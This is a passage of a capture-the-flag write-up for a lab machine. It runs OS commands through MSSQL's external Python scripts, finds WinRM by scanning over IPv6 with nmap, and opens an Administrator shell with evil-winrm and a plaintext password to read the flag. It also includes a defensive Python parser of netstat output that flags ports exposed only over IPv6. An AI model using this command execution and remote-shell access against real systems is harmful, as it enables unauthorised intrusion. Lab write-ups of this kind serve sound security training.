IPv6 ports
SQL (ctflover dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("netstat -ano"))'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4824
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 496
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1180
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1608
--SNIP--
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 928
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 4808
TCP [::]:5357 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:41433 [::]:0 LISTENING 4824
Port 5985 is on on both IPv4 and IPv6; my nmap scan, which only scanned IPv4, was not able to find port 5985, so let's check IPv6.
➜ poo nmap -6 -p- dead:beef::1001 --min-rate 10000 -v -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-18 21:46 IST
Initiating Parallel DNS resolution of 1 host. at 21:46
Completed Parallel DNS resolution of 1 host. at 21:46, 0.00s elapsed
Initiating Connect Scan at 21:46
Scanning dead:beef::1001 [65535 ports]
Discovered open port 80/tcp on dead:beef::1001
Discovered open port 5985/tcp on dead:beef::1001
Port 5985 is open.
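The lesson here is that a port inventory or scan that only covers IPv4 can miss services bound to the IPv6 wildcard address. As an added example (not part of the original writeup), the following Python parses `netstat -ano` output and reports which listening TCP ports are reachable over both stacks and which are reachable over IPv6 only, ignoring loopback-only binds. The sample listing is constructed to mirror the shape of the output above and is not the host's real output.

```python
"""Inventory LISTENING TCP sockets from Windows `netstat -ano` output by address family."""
import ipaddress
import re

# Constructed sample in the shape `netstat -ano` prints; not the target's real output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:41433          0.0.0.0:0              LISTENING       4824
  TCP    10.13.38.11:49723      10.13.38.1:445         ESTABLISHED     4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       928
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1433              [::]:0                 LISTENING       4808
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::1]:41433            [::]:0                 LISTENING       4824
  UDP    0.0.0.0:500            *:*                                    1180
"""

# One netstat row: proto, local, foreign, optional state (UDP rows have none), PID.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def split_local(local):
    """Split a netstat local address into (family, host, port); IPv6 prints as [host]:port."""
    if local.startswith("["):
        host, _, port = local[1:].rpartition("]:")
    else:
        host, _, port = local.rpartition(":")
    family = "ipv6" if ipaddress.ip_address(host).version == 6 else "ipv4"
    return family, host, int(port)


def parse_listeners(text):
    """Return {"ipv4": {port: {(host, pid), ...}}, "ipv6": {...}} for LISTENING TCP sockets."""
    inv = {"ipv4": {}, "ipv6": {}}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["proto"] != "TCP" or m["state"] != "LISTENING":
            continue
        family, host, port = split_local(m["local"])
        inv[family].setdefault(port, set()).add((host, int(m["pid"])))
    return inv


def exposed_ports(listeners):
    """Ports with at least one non-loopback bind, i.e. reachable from the network."""
    return {
        port for port, binds in listeners.items()
        if any(not ipaddress.ip_address(host).is_loopback for host, _pid in binds)
    }


def ipv6_only_ports(inv):
    """Network-reachable ports an IPv4-only scan would never see."""
    return sorted(exposed_ports(inv["ipv6"]) - exposed_ports(inv["ipv4"]))


def dual_stack_ports(inv):
    """Network-reachable ports present on both address families."""
    return sorted(exposed_ports(inv["ipv6"]) & exposed_ports(inv["ipv4"]))


if __name__ == "__main__":
    inventory = parse_listeners(SAMPLE_NETSTAT)
    print("reachable on both stacks:", dual_stack_ports(inventory))
    print("reachable on IPv6 only  :", ipv6_only_ports(inventory))
```

On the constructed sample, 41433 is bound to `::1` on IPv6 and so is not counted as IPv6-exposed, while 135, 445 and 1433 are reachable only over IPv6. Running the same parser against a real `netstat -ano` dump is a quick way to confirm whether an IPv4-only scan, like the one in this writeup, has left part of the attack surface unreviewed.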
Now I can evil-winrm into the target, but first I need the target's hostname in my /etc/hosts file.
SQL (ctflover dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("hostname"))'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
cat /etc/hosts
10.13.38.11 intranet.poo compatibility.intranet.poo
dead:beef::1001 compatibility
Got shell ->
➜ poo evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i compatibility
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe0e2ef096f9a96a01c646--snip--}